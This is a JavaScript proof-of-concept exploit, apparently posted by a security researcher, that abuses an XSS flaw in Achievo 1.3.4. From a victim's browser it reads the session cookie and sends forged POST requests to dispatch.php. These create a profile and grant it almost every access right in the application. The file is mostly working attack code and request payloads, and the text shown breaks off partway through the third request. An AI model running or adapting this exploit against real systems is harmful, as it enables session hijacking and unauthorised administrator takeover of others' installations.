/*

Achievo 1.3.4 XSS add admin priviledges AJAX PoC

By: ryan[A]bonsai-sec.com

NOTES: Change user_id, profile_id, user_name and user_pass. user_id and profile_id both increment by a factor of 1 each time they are created, even after deletion.

*/

// Change these variables //

var user_id = "1"; // Your user id
var profile_id = "3"; // Last created profile id + 1
var user_name = "bonsai-sec"; // Your username
var user_pass = "bonsai-sec"; // Your password
var atkstackid = "4a6479dd5a73d";

// DO NOT EDIT BELOW THIS LINE ----------------------

function utf8_encode ( argString ) {
    // http://kevin.vanzonneveld.net
    // +   original by: Webtoolkit.info (http://www.webtoolkit.info/)
    // +   improved by: Kevin van Zonneveld (http://kevin.vanzonneveld.net)
    // +   improved by: sowberry
    // +    tweaked by: Jack
    // +   bugfixed by: Onno Marsman
    // +   improved by: Yves Sucaet
    // +   bugfixed by: Onno Marsman
    // *     example 1: utf8_encode('Kevin van Zonneveld');
    // *     returns 1: 'Kevin van Zonneveld'
 
    var string = (argString+'').replace(/\r\n/g, "\n").replace(/\r/g, "\n");
 
    var utftext = "";
    var start, end;
    var stringl = 0;
 
    start = end = 0;
    stringl = string.length;
    for (var n = 0; n < stringl; n++) {
        var c1 = string.charCodeAt(n);
        var enc = null;
 
        if (c1 < 128) {
            end++;
        } else if((c1 > 127) && (c1 < 2048)) {
            enc = String.fromCharCode((c1 >> 6) | 192) + String.fromCharCode((c1 & 63) | 128);
        } else {
            enc = String.fromCharCode((c1 >> 12) | 224) + String.fromCharCode(((c1 >> 6) & 63) | 128) + String.fromCharCode((c1 & 63) | 128);
        }
        if (enc !== null) {
            if (end > start) {
                utftext += string.substring(start, end);
            }
            utftext += enc;
            start = end = n+1;
        }
    }
 
    if (end > start) {
        utftext += string.substring(start, string.length);
    }
 
    return utftext;
}


function md5 ( str ) {
    // http://kevin.vanzonneveld.net
    // +   original by: Webtoolkit.info (http://www.webtoolkit.info/)
    // + namespaced by: Michael White (http://getsprink.com)
    // +    tweaked by: Jack
    // +   improved by: Kevin van Zonneveld (http://kevin.vanzonneveld.net)
    // +      input by: Brett Zamir (http://brett-zamir.me)
    // +   bugfixed by: Kevin van Zonneveld (http://kevin.vanzonneveld.net)
    // -    depends on: utf8_encode
    // *     example 1: md5('Kevin van Zonneveld');
    // *     returns 1: '6e658d4bfcb59cc13f96c14450ac40b9'
 
    var xl;
 
    var rotateLeft = function(lValue, iShiftBits) {
        return (lValue<<iShiftBits) | (lValue>>>(32-iShiftBits));
    };
 
    var addUnsigned = function(lX,lY) {
        var lX4,lY4,lX8,lY8,lResult;
        lX8 = (lX & 0x80000000);
        lY8 = (lY & 0x80000000);
        lX4 = (lX & 0x40000000);
        lY4 = (lY & 0x40000000);
        lResult = (lX & 0x3FFFFFFF)+(lY & 0x3FFFFFFF);
        if (lX4 & lY4) {
            return (lResult ^ 0x80000000 ^ lX8 ^ lY8);
        }
        if (lX4 | lY4) {
            if (lResult & 0x40000000) {
                return (lResult ^ 0xC0000000 ^ lX8 ^ lY8);
            } else {
                return (lResult ^ 0x40000000 ^ lX8 ^ lY8);
            }
        } else {
            return (lResult ^ lX8 ^ lY8);
        }
    };
 
    var _F = function(x,y,z) { return (x & y) | ((~x) & z); };
    var _G = function(x,y,z) { return (x & z) | (y & (~z)); };
    var _H = function(x,y,z) { return (x ^ y ^ z); };
    var _I = function(x,y,z) { return (y ^ (x | (~z))); };
 
    var _FF = function(a,b,c,d,x,s,ac) {
        a = addUnsigned(a, addUnsigned(addUnsigned(_F(b, c, d), x), ac));
        return addUnsigned(rotateLeft(a, s), b);
    };
 
    var _GG = function(a,b,c,d,x,s,ac) {
        a = addUnsigned(a, addUnsigned(addUnsigned(_G(b, c, d), x), ac));
        return addUnsigned(rotateLeft(a, s), b);
    };
 
    var _HH = function(a,b,c,d,x,s,ac) {
        a = addUnsigned(a, addUnsigned(addUnsigned(_H(b, c, d), x), ac));
        return addUnsigned(rotateLeft(a, s), b);
    };
 
    var _II = function(a,b,c,d,x,s,ac) {
        a = addUnsigned(a, addUnsigned(addUnsigned(_I(b, c, d), x), ac));
        return addUnsigned(rotateLeft(a, s), b);
    };
 
    var convertToWordArray = function(str) {
        var lWordCount;
        var lMessageLength = str.length;
        var lNumberOfWords_temp1=lMessageLength + 8;
        var lNumberOfWords_temp2=(lNumberOfWords_temp1-(lNumberOfWords_temp1 % 64))/64;
        var lNumberOfWords = (lNumberOfWords_temp2+1)*16;
        var lWordArray=new Array(lNumberOfWords-1);
        var lBytePosition = 0;
        var lByteCount = 0;
        while ( lByteCount < lMessageLength ) {
            lWordCount = (lByteCount-(lByteCount % 4))/4;
            lBytePosition = (lByteCount % 4)*8;
            lWordArray[lWordCount] = (lWordArray[lWordCount] | (str.charCodeAt(lByteCount)<<lBytePosition));
            lByteCount++;
        }
        lWordCount = (lByteCount-(lByteCount % 4))/4;
        lBytePosition = (lByteCount % 4)*8;
        lWordArray[lWordCount] = lWordArray[lWordCount] | (0x80<<lBytePosition);
        lWordArray[lNumberOfWords-2] = lMessageLength<<3;
        lWordArray[lNumberOfWords-1] = lMessageLength>>>29;
        return lWordArray;
    };
 
    var wordToHex = function(lValue) {
        var wordToHexValue="",wordToHexValue_temp="",lByte,lCount;
        for (lCount = 0;lCount<=3;lCount++) {
            lByte = (lValue>>>(lCount*8)) & 255;
            wordToHexValue_temp = "0" + lByte.toString(16);
            wordToHexValue = wordToHexValue + wordToHexValue_temp.substr(wordToHexValue_temp.length-2,2);
        }
        return wordToHexValue;
    };
 
    var x=[],
        k,AA,BB,CC,DD,a,b,c,d,
        S11=7, S12=12, S13=17, S14=22,
        S21=5, S22=9 , S23=14, S24=20,
        S31=4, S32=11, S33=16, S34=23,
        S41=6, S42=10, S43=15, S44=21;
 
    str = this.utf8_encode(str);
    x = convertToWordArray(str);
    a = 0x67452301; b = 0xEFCDAB89; c = 0x98BADCFE; d = 0x10325476;
    
    xl = x.length;
    for (k=0;k<xl;k+=16) {
        AA=a; BB=b; CC=c; DD=d;
        a=_FF(a,b,c,d,x[k+0], S11,0xD76AA478);
        d=_FF(d,a,b,c,x[k+1], S12,0xE8C7B756);
        c=_FF(c,d,a,b,x[k+2], S13,0x242070DB);
        b=_FF(b,c,d,a,x[k+3], S14,0xC1BDCEEE);
        a=_FF(a,b,c,d,x[k+4], S11,0xF57C0FAF);
        d=_FF(d,a,b,c,x[k+5], S12,0x4787C62A);
        c=_FF(c,d,a,b,x[k+6], S13,0xA8304613);
        b=_FF(b,c,d,a,x[k+7], S14,0xFD469501);
        a=_FF(a,b,c,d,x[k+8], S11,0x698098D8);
        d=_FF(d,a,b,c,x[k+9], S12,0x8B44F7AF);
        c=_FF(c,d,a,b,x[k+10],S13,0xFFFF5BB1);
        b=_FF(b,c,d,a,x[k+11],S14,0x895CD7BE);
        a=_FF(a,b,c,d,x[k+12],S11,0x6B901122);
        d=_FF(d,a,b,c,x[k+13],S12,0xFD987193);
        c=_FF(c,d,a,b,x[k+14],S13,0xA679438E);
        b=_FF(b,c,d,a,x[k+15],S14,0x49B40821);
        a=_GG(a,b,c,d,x[k+1], S21,0xF61E2562);
        d=_GG(d,a,b,c,x[k+6], S22,0xC040B340);
        c=_GG(c,d,a,b,x[k+11],S23,0x265E5A51);
        b=_GG(b,c,d,a,x[k+0], S24,0xE9B6C7AA);
        a=_GG(a,b,c,d,x[k+5], S21,0xD62F105D);
        d=_GG(d,a,b,c,x[k+10],S22,0x2441453);
        c=_GG(c,d,a,b,x[k+15],S23,0xD8A1E681);
        b=_GG(b,c,d,a,x[k+4], S24,0xE7D3FBC8);
        a=_GG(a,b,c,d,x[k+9], S21,0x21E1CDE6);
        d=_GG(d,a,b,c,x[k+14],S22,0xC33707D6);
        c=_GG(c,d,a,b,x[k+3], S23,0xF4D50D87);
        b=_GG(b,c,d,a,x[k+8], S24,0x455A14ED);
        a=_GG(a,b,c,d,x[k+13],S21,0xA9E3E905);
        d=_GG(d,a,b,c,x[k+2], S22,0xFCEFA3F8);
        c=_GG(c,d,a,b,x[k+7], S23,0x676F02D9);
        b=_GG(b,c,d,a,x[k+12],S24,0x8D2A4C8A);
        a=_HH(a,b,c,d,x[k+5], S31,0xFFFA3942);
        d=_HH(d,a,b,c,x[k+8], S32,0x8771F681);
        c=_HH(c,d,a,b,x[k+11],S33,0x6D9D6122);
        b=_HH(b,c,d,a,x[k+14],S34,0xFDE5380C);
        a=_HH(a,b,c,d,x[k+1], S31,0xA4BEEA44);
        d=_HH(d,a,b,c,x[k+4], S32,0x4BDECFA9);
        c=_HH(c,d,a,b,x[k+7], S33,0xF6BB4B60);
        b=_HH(b,c,d,a,x[k+10],S34,0xBEBFBC70);
        a=_HH(a,b,c,d,x[k+13],S31,0x289B7EC6);
        d=_HH(d,a,b,c,x[k+0], S32,0xEAA127FA);
        c=_HH(c,d,a,b,x[k+3], S33,0xD4EF3085);
        b=_HH(b,c,d,a,x[k+6], S34,0x4881D05);
        a=_HH(a,b,c,d,x[k+9], S31,0xD9D4D039);
        d=_HH(d,a,b,c,x[k+12],S32,0xE6DB99E5);
        c=_HH(c,d,a,b,x[k+15],S33,0x1FA27CF8);
        b=_HH(b,c,d,a,x[k+2], S34,0xC4AC5665);
        a=_II(a,b,c,d,x[k+0], S41,0xF4292244);
        d=_II(d,a,b,c,x[k+7], S42,0x432AFF97);
        c=_II(c,d,a,b,x[k+14],S43,0xAB9423A7);
        b=_II(b,c,d,a,x[k+5], S44,0xFC93A039);
        a=_II(a,b,c,d,x[k+12],S41,0x655B59C3);
        d=_II(d,a,b,c,x[k+3], S42,0x8F0CCC92);
        c=_II(c,d,a,b,x[k+10],S43,0xFFEFF47D);
        b=_II(b,c,d,a,x[k+1], S44,0x85845DD1);
        a=_II(a,b,c,d,x[k+8], S41,0x6FA87E4F);
        d=_II(d,a,b,c,x[k+15],S42,0xFE2CE6E0);
        c=_II(c,d,a,b,x[k+6], S43,0xA3014314);
        b=_II(b,c,d,a,x[k+13],S44,0x4E0811A1);
        a=_II(a,b,c,d,x[k+4], S41,0xF7537E82);
        d=_II(d,a,b,c,x[k+11],S42,0xBD3AF235);
        c=_II(c,d,a,b,x[k+2], S43,0x2AD7D2BB);
        b=_II(b,c,d,a,x[k+9], S44,0xEB86D391);
        a=addUnsigned(a,AA);
        b=addUnsigned(b,BB);
        c=addUnsigned(c,CC);
        d=addUnsigned(d,DD);
    }
 
    var temp = wordToHex(a)+wordToHex(b)+wordToHex(c)+wordToHex(d);
 
    return temp.toLowerCase();
}

alert(md5(user_pass));

// XML Request

var xmlhttp=false;

if (!xmlhttp && typeof XMLHttpRequest!='undefined') {
    try {
        xmlhttp = new XMLHttpRequest();
    } catch (e) {
        xmlhttp=false;
    }
}
if (!xmlhttp && window.createRequest) {
    try {
        xmlhttp = window.createRequest();
    } catch (e) {
        xmlhttp=false;
    }
}


// Get the session cookie to use in the post data
var cookie_str = unescape(document.cookie);
var session_str = cookie_str.split("achievo=")[1];
alert(session_str);



//
//
//
//
// Create Profile --------------------------------------------------
//
//
//
//

xmlhttp.open("POST", "dispatch.php?",true);
xmlhttp.onreadystatechange=function() {
    if (xmlhttp.readyState==4) {
        //alert(xmlhttp.responseText)
    }
}

xmlhttp.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------12316303522190")

var mpp_str0_0 = (<r><![CDATA[
POSTDATA =-----------------------------12316303522190
Content-Disposition: form-data; name="atklevel"

1
-----------------------------12316303522190
Content-Disposition: form-data; name="atkprevlevel"

0
-----------------------------12316303522190
Content-Disposition: form-data; name="atkstackid"

]]></r>).toString();


var mpp_str0_1 = (<r><![CDATA[
-----------------------------12316303522190
Content-Disposition: form-data; name="atkreturnbehaviour"

0
-----------------------------12316303522190
Content-Disposition: form-data; name="achievo"

]]></r>).toString();


var mpp_str0_2 = (<r><![CDATA[
-----------------------------12316303522190
Content-Disposition: form-data; name="atkescape"


-----------------------------12316303522190
Content-Disposition: form-data; name="atkaction"

save
-----------------------------12316303522190
Content-Disposition: form-data; name="atkprevaction"

admin
-----------------------------12316303522190
Content-Disposition: form-data; name="atkfieldprefix"


-----------------------------12316303522190
Content-Disposition: form-data; name="atknodetype"

employee.profile
-----------------------------12316303522190
Content-Disposition: form-data; name="atkprimkey"


-----------------------------12316303522190
Content-Disposition: form-data; name="name"

bonsai-sec
-----------------------------12316303522190
Content-Disposition: form-data; name="atksaveandcontinue"

Save and edit
-----------------------------12316303522190--


]]></r>).toString();

var post_data = mpp_str0_0 + atkstackid + mpp_str0_1 + session_str + mpp_str0_2;

xmlhttp.send(post_data); 


//
//
//
//
// Set priviledges to profile
// (id = needs to be changed to the correct profile id. Increments by 1)
//
//
//
//


xmlhttp.open("POST", "dispatch.php?",true);
xmlhttp.onreadystatechange=function() {
    if (xmlhttp.readyState==4) {
        //alert(xmlhttp.responseText)
    }
}

xmlhttp.setRequestHeader("Content-Type", "multipart/form-data; boundary=--------------------------101891115630345")

var mpp_str1_0 = (<r><![CDATA[
POSTDATA =----------------------------101891115630345
Content-Disposition: form-data; name="atklevel"

1
----------------------------101891115630345
Content-Disposition: form-data; name="atkprevlevel"

1
----------------------------101891115630345
Content-Disposition: form-data; name="atkstackid"

]]></r>).toString();


var mpp_str1_1 = (<r><![CDATA[
----------------------------101891115630345
Content-Disposition: form-data; name="achievo"

]]></r>).toString();


var mpp_str1_2 = (<r><![CDATA[
----------------------------101891115630345
Content-Disposition: form-data; name="atkescape"


----------------------------101891115630345
Content-Disposition: form-data; name="atkaction"

update
----------------------------101891115630345
Content-Disposition: form-data; name="atkprevaction"

edit
----------------------------101891115630345
Content-Disposition: form-data; name="atkfieldprefix"


----------------------------101891115630345
Content-Disposition: form-data; name="atknodetype"

employee.profile
----------------------------101891115630345
Content-Disposition: form-data; name="atkprimkey"

profile.id=']]></r>).toString();


var mpp_str1_3 = (<r><![CDATA[
----------------------------101891115630345
Content-Disposition: form-data; name="id"

]]></r>).toString();


var mpp_str1_4 = (<r><![CDATA[
----------------------------101891115630345
Content-Disposition: form-data; name="name"

bonsai-sec
----------------------------101891115630345
Content-Disposition: form-data; name="divstate['div_employee']"

opened
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.profile.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.profile.add
----------------------------101891115630345 
Content-Disposition: form-data; name="accessrights[]"

employee.profile.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.profile.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.profile.grantall
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.employee.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.employee.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.employee.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.employee.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.employee.stats
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.employee.view_all
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.usercontracts.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.usercontracts.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.usercontracts.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.usercontracts.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.userprefs.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.functionlevel.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.functionlevel.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.functionlevel.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.functionlevel.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.department.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.department.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.department.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

employee.department.delete
----------------------------101891115630345
Content-Disposition: form-data; name="divstate['div_timereg']"

opened
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.hours.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.hours.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.hours.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.hours.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.hours.lock
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.hours.unlock
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.hours.any_user
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.hours.any_project
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.hours_approve.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.hours_approve.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.hours_approve.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.hours_approve.approve
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.hours_approve.disapprove
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.hours_approve.any_user
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.hours_lock.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.hours_lock.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.hours_lock.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.workperiod.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.workperiod.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.workperiod.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.workperiod.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.overtime_balance.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

timereg.overtime_balance.delete
----------------------------101891115630345
Content-Disposition: form-data; name="divstate['div_project']"

opened
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.project.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.project.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.project.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.project.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.project.stats
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.project.planning
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.project.initialplanning
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.project.any_project
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.project.changeabbreviation
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.project.tab_finance
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.project.tab_planning
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.phase.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.phase.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.phase.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.deliverable.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.deliverable.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.deliverable.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.activity.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.activity.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.activity.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.activity.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.activity.stats
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.tpl_phase.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.tpl_phase.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.tpl_phase.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.tpl_phase.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.tpl_project.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.tpl_project.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.tpl_project.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.tpl_project.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.role.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.role.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.role.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.role.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.mastergantt_colorconfig.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

project.mastergantt_colorconfig.edit
----------------------------101891115630345
Content-Disposition: form-data; name="divstate['div_organization']"

opened
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

organization.organization.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

organization.organization.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

organization.organization.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

organization.organization.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

organization.organization.document
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

organization.contact.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

organization.contact.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

organization.contact.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

organization.contact.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

organization.contracts.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

organization.contracts.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

organization.contracts.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

organization.contracts.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

organization.contracttype.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

organization.contracttype.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

organization.contracttype.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

organization.contracttype.delete
----------------------------101891115630345
Content-Disposition: form-data; name="divstate['div_notes']"

opened
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

notes.project_notes.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

notes.project_notes.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

notes.project_notes.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

notes.project_notes.delete
----------------------------101891115630345
Content-Disposition: form-data; name="divstate['div_scheduler']"

opened
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

scheduler.scheduler.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

scheduler.scheduler.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

scheduler.scheduler.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

scheduler.scheduler.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

scheduler.scheduler.all_non_private
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

scheduler.scheduler_category.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

scheduler.scheduler_category.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

scheduler.scheduler_category.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

scheduler.scheduler_category.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

scheduler.scheduler_holidays.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

scheduler.scheduler_holidays.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

scheduler.scheduler_holidays.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

scheduler.scheduler_holidays.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

scheduler.scheduler_email_template.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

scheduler.scheduler_email_template.edit
----------------------------101891115630345
Content-Disposition: form-data; name="divstate['div_todo']"

opened
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

todo.todo.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

todo.todo.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

todo.todo.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

todo.todo.delete
----------------------------101891115630345
Content-Disposition: form-data; name="divstate['div_reports']"

opened
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

reports.weekreport.report
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

reports.weekreport.view_all
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

reports.weekreport.view_managed
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

reports.hoursurvey.report
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

reports.hoursurvey.view_all
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

reports.hoursurvey.view_managed
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

reports.projectstatus.report
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

reports.projectstatus.any_user
----------------------------101891115630345
Content-Disposition: form-data; name="divstate['div_quotation']"

opened
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

quotation.quotation.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

quotation.quotation.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

quotation.quotation.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

quotation.quotation.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

quotation.payment.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

quotation.payment.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

quotation.payment.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

quotation.payment.delete
----------------------------101891115630345
Content-Disposition: form-data; name="divstate['div_docmanager']"

opened
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

docmanager.document.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

docmanager.document.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

docmanager.document.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

docmanager.document.generate
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

docmanager.documenttype.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

docmanager.documenttype.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

docmanager.documenttype.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

docmanager.documenttype.delete
----------------------------101891115630345
Content-Disposition: form-data; name="divstate['div_crm']"

opened
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

crm.campaign.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

crm.campaign.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

crm.campaign.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

crm.campaign.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

crm.campaign_status.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

crm.campaign_status.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

crm.campaign_status.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

crm.campaign_status.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

crm.campaign_type.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

crm.campaign_type.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

crm.campaign_type.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

crm.campaign_type.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

crm.lead.admin
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

crm.lead.add
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

crm.lead.edit
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

crm.lead.delete
----------------------------101891115630345
Content-Disposition: form-data; name="accessrights[]"

crm.lead.convert
----------------------------101891115630345
Content-Disposition: form-data; name="atksaveandclose"

Save and close
----------------------------101891115630345--


]]></r>).toString();

var post_data1 = mpp_str1_0 + atkstackid + mpp_str1_1 + session_str + mpp_str1_2 + profile_id + mpp_str1_3 + profile_id + mpp_str1_4;

xmlhttp.send(post_data1); 


//
//
//
//
// Add priviledges to user  ----------------------------------------------------------------
// Person id needs to be changed to your user_id. Incremenets by 1.
//
//
//


xmlhttp.open("POST", "dispatch.php?",true);
xmlhttp.onreadystatechange=function() {
    if (xmlhttp.readyState==4) {
        //alert(xmlhttp.responseText)
    }
}

